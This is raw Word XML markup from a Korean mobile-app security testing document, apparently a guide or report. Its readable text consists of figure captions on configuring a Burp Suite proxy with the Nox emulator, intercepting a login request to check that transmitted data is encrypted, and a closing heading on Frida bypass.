                <v:shape id="그림 77" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:46799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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId32" o:title=""/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 82" o:spid="_x0000_s1028" style="position:absolute;left:863;top:2946;width:685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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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17269F" wp14:editId="75316B57">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>716915</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5172710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="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E6F" w:rsidRPr="00B5593B" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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67E98">
                              <w:t>21</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>target – scope</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>에</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>서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모</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>바일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344CC8">
                              <w:t>소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추</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t xml:space="preserve">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7269F" id="Text Box 108" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:407.3pt;width:368.5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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00B5593B" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00667E98">
                        <w:t>21</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>target – scope</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>에</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>서</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 모</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>바일</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 주</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>소</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 추</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t xml:space="preserve">가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23A0">
        <w:rPr>
          <w:b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0" wp14:anchorId="03EFD0AF" wp14:editId="22258897">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>716915</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3809365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="1306195"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="27305"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="97" name="그룹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306195"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4679950" cy="1308100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="78" name="그림 7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1308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3" name="직사각형 83"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="604520" y="457200"/>
                            <a:ext cx="1082040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656080" y="396240"/>
                            <a:ext cx="106997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0E6F" w:rsidRPr="00D33FB2" w:rsidRDefault="00610E6F" w:rsidP="007E3234">
                              <w:pPr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</w:rPr>
                                <w:t>모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바일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</w:rPr>
                                <w:t xml:space="preserve"> 주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소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</w:rPr>
                                <w:t xml:space="preserve"> 입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FD0AF" id="그룹 97" o:spid="_x0000_s1041" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:299.95pt;width:368.5pt;height:102.85pt;z-index:251858944;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="46799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" o:allowoverlap="f">
                <v:shape id="그림 78" o:spid="_x0000_s1042" type="#_x0000_t75" style="position:absolute;width:46799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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId34" o:title=""/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 83" o:spid="_x0000_s1043" style="position:absolute;left:6045;top:4572;width:108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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <v:shape id="Text Box 88" o:spid="_x0000_s1044" type="#_x0000_t202" style="position:absolute;left:16560;top:3962;width:1070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:rsidR="00610E6F" w:rsidRPr="00D33FB2" w:rsidRDefault="00610E6F" w:rsidP="007E3234">
                        <w:pPr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</w:rPr>
                          <w:t>모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>바일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</w:rPr>
                          <w:t xml:space="preserve"> 주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>소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</w:rPr>
                          <w:t xml:space="preserve"> 입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>력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F5D97B" wp14:editId="36A5083E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>716915</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6677025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="467995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E6F" w:rsidRPr="004A0933" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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67E98">
                              <w:t>22</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>모</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>바일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344CC8">
                              <w:t>소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입</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8"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5D97B" id="Text Box 109" o:spid="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:525.75pt;width:368.5pt;height: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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="004A0933" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00667E98">
                        <w:t>22</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>모</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>바일</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 주</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>소</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 입</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>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3A1414" wp14:editId="73213022">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>716915</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3501390</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="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E6F" w:rsidRPr="00E372C5" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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67E98">
                              <w:t>20</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>녹스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포트번호로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A1414" id="Text Box 107" o:spid="_x0000_s1046" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:275.7pt;width:368.5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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00E372C5" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00667E98">
                        <w:t>20</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>녹스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포트번호로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설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23A0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0" wp14:anchorId="5B4085B5" wp14:editId="5556463F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1889125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="1555115"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="26035"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="99" name="그룹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555115"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4679315" cy="1554480"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="76" name="그림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b="11625"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4679315" cy="155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" name="직사각형 80"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1346200" y="116840"/>
                            <a:ext cx="449580" cy="213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사각형 81"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1285240" y="807720"/>
                            <a:ext cx="1272540" cy="2819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849120" y="76200"/>
                            <a:ext cx="1567180" cy="290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10E6F" w:rsidRPr="00D33FB2" w:rsidRDefault="00610E6F" w:rsidP="00D33FB2">
                              <w:pPr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D33FB2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</w:rPr>
                                <w:t>녹</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>스</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2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</w:rPr>
                                <w:t>에</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>서</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2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</w:rPr>
                                <w:t xml:space="preserve"> 설</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>정한</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2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</w:rPr>
                                <w:t xml:space="preserve"> 포</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>트</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2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</w:rPr>
                                <w:t xml:space="preserve"> 입</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D33FB2">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>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085B5" id="그룹 99" o:spid="_x0000_s1047" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:148.75pt;width:368.5pt;height:122.45pt;z-index:251855872;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="46793,1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" o:allowoverlap="f">
                <v:shape id="그림 76" o:spid="_x0000_s1048" type="#_x0000_t75" style="position:absolute;width:46793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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId36" o:title="" cropbottom="7619f"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 80" o:spid="_x0000_s1049" style="position:absolute;left:13462;top:1168;width:4495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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <v:rect id="직사각형 81" o:spid="_x0000_s1050" style="position:absolute;left:12852;top:8077;width:1272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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <v:shape id="Text Box 87" o:spid="_x0000_s1051" type="#_x0000_t202" style="position:absolute;left:18491;top:762;width:1567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" fillcolor="white [3212]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w:rsidR="00610E6F" w:rsidRPr="00D33FB2" w:rsidRDefault="00610E6F" w:rsidP="00D33FB2">
                        <w:pPr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D33FB2">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>녹</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>스</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>에</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>서</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 설</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>정한</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 포</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>트</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 입</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D33FB2">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>력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9D1C264" wp14:editId="2F1B588F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>716915</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1637030</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="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E6F" w:rsidRPr="00A71619" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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 w:rsidR="00667E98">
                              <w:t>9</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>버</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>프</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>스위트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세팅에서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포트</w:t>
                            </w:r>
                            <w:r w:rsidR="00344C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4CC8">
                              <w:t>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1C264" id="Text Box 106" o:spid="_x0000_s1052" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:128.9pt;width:368.5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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00A71619" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6"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 w:rsidR="00667E98">
                        <w:t>9</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>버</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>프</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>스위트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세팅에서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포트</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>추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3EB1" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b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0" wp14:anchorId="472144CF" wp14:editId="62599163">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>356779</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="1223645"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="14605"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="94" name="그룹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23645"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4679950" cy="1224280"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="75" name="그림 7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1224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9" name="직사각형 79"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="203200" y="431800"/>
                            <a:ext cx="441960" cy="121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897CB" id="그룹 94" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:28.1pt;width:368.5pt;height:96.35pt;z-index:251839488;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="46799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" o:allowoverlap="f">
                <v:shape id="그림 75" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:46799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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId38" o:title=""/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 79" o:spid="_x0000_s1028" style="position:absolute;left:2032;top:4318;width:44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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00976691" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>버</w:t>
      </w:r>
      <w:r w:rsidR="004F48B6" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>프</w:t>
      </w:r>
      <w:r w:rsidR="00976691" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>스위트 프록시 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652F63" w:rsidRDefault="00652F63" w:rsidP="00652F63">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36C99" w:rsidRPr="00C223A0" w:rsidRDefault="00652F63" w:rsidP="00353EB1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b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A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2B7B27" wp14:editId="1C204822">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>716915</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1196340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="467995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E6F" w:rsidRPr="007D2C1D" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                              <w:rPr>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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67E98">
                              <w:t>23</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>로</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:t>그인</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 과</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:t>정</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 프</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:t>록시</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 요</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:t>청</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 결</w:t>
                            </w:r>
                            <w:r w:rsidR="004F48B6">
                              <w:t>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B7B27" id="Text Box 110" o:spid="_x0000_s1053" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:94.2pt;width:368.5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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="007D2C1D" w:rsidRDefault="00610E6F" w:rsidP="00652F63">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00667E98">
                        <w:t>23</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>로</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:t>그인</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 과</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:t>정</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 프</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:t>록시</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 요</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:t>청</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 결</w:t>
                      </w:r>
                      <w:r w:rsidR="004F48B6">
                        <w:t>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23A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251883520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="1D7C0656" wp14:editId="3A0BDDBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>369025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4679950" cy="770255"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="10795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77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691" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>전송 데이터 암호화 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652F63" w:rsidRPr="00976691" w:rsidRDefault="00652F63" w:rsidP="00652F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</w:pPr>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00176F06" w:rsidRDefault="000433C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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">프리다 우회 </w:t>
      </w:r>
